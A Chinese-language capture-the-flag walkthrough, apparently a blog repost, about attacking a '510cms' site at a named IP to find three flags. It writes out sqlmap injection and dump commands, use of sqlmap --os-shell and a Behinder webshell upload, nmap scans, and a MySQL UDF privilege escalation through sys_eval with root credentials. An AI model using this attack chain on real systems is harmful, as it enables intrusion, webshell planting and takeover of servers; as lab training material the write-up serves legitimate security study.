对510cms进行渗透测试,找到其中的3个flag

阅读: 评论:0

对510cms进行渗透测试,找到其中的3个flag

对510cms进行渗透测试,找到其中的3个flag

拿到网站

 

简单观察后发现url区域存在传参

简单测试找到存在注入的界面(此网站多处网址存在注入)

这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入

  

我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破

sqlmap -u 180.76.226.182/about.php?listid=6 --current-db

爆当前数据库名

得到数据库名为“510cms”

然后指定该数据库爆它的所有表

sqlmap -u 180.76.226.182/about.php?listid=6 -D 510cms --tables得到如下一些表

根据经验我们爆510_admin表的所有内容

sqlmap -u 180.76.226.182/about.php?listid=6 -D 510cms -T 510_admin --dump

需要等待较长时间

 

 

这里找到第一个flag

并找到登录后台的name和passwd

admin—123qwer(采用md5加密)

但是我们没有发现登录后台的地址

所以我们尝试使用御剑扫描此网站

发现很多网站后台

逐一打开查看能够找到管理登录的界面和一些没有权限登录的界面

其中没有权限登录的界面点击提示后同样打开管理登录界面

  

返回浏览器使用前面获取到的用户名和密码尝试登录

(注意登录界面的验证码需要区分大小写)

  

登录成功

发现大量信息

我们可以尝试挂马

sqlmap -u 180.76.226.182/about.php?listid=6 --os-shell --batch --thread 5

  

挂马成功

同时给我们两个页面

第二个是sqlmap挂的马的界面

第一个是给了我们一个上传的页面

我们通过第一个上传的界面在网站的根目录上传一个马

(要能被网站的中间件解析、能被执行)

此马为冰蝎下的shell.php(为防止重复将其改了名为zhaoxi.php)

如下图

访问该界面发现已经上传成功

然后使用冰蝎尝试连接此马

密码在我们上传的马里

连接成功

然后我们就可以通过冰蝎对此网站进行一些简单的操作

最后我们在网站的根目录下找到了第二个flag

也能在此目录下看到我们挂的马

  

经过查找

在此主机的根目录下发现第三个flag

但是我们没有权限打开,需要进行提权

此时想到前面我们登录网站管理后台发现的一些信息

我们可以利用这些信息去搜索相关服务器、数据库等版本的提权漏洞信息进行提权

最后我们发现需要利用MySQL数据库此版本的一个udf提权漏洞

(此漏洞的利用需要知道MySQL数据库的端口、用户名和密码等信息)

我们尝试使用namap工具扫描端口开放情况

nmap 180.76.226.182 -p 1-65535

(需要等待一段时间,可点击回车键查看进度)

  

指定该端口添加参数进行详细扫描

nmap 180.76.226.182 -p3306 -A

确定该端口就是masql数据库的端口,且处于开放状态

Mysql数据库的用户名和密码默认存放在首页地址的config.php中

我们可以去看一看

我们在首页地址下并没有找到该文件,但是发现了一个configs

打开发现config.php存在此文件里

  

找到用户名和密码均为root、采用GBK编码等信息

接下来我们尝试采用两种方式进行udf提权

1.使用Navicat工具远程连接数据库

连接成功

使用查询语句找出写入目录

查询—>新建查询—>输入语句—>运行

show variables like '%plugin%'; 

将udf.dll代码的16进制数写入

(可搜索udf.dll源码通过在线工具转换为16进制)

创建sys_eval函数

这里函数已被创建过了所以会报错显示函数已存在

既然已经有了这个函数,我们就可以通过利用sys_eval函数读取根目录下的flag

select sys_eval('cat /');

得到第三个flag

接下来我们使用第二种方式找到第三个flag

2.使用sqlmap提权

(这里最好使用kali下的sqlmap,Windows下的sqlmap可能缺少某些库导致报错)

sqlmap -d "mysql://root:root@180.76.226.182:3306/mysql" --os-shell

注意这里要输入2来选择64-bit

进入shell

ls查看目录下的文件找到第三个flag

cat /查看flag

完成

本文发布于:2024-02-01 10:36:40,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170675499836019.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:测试   cms   flag
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23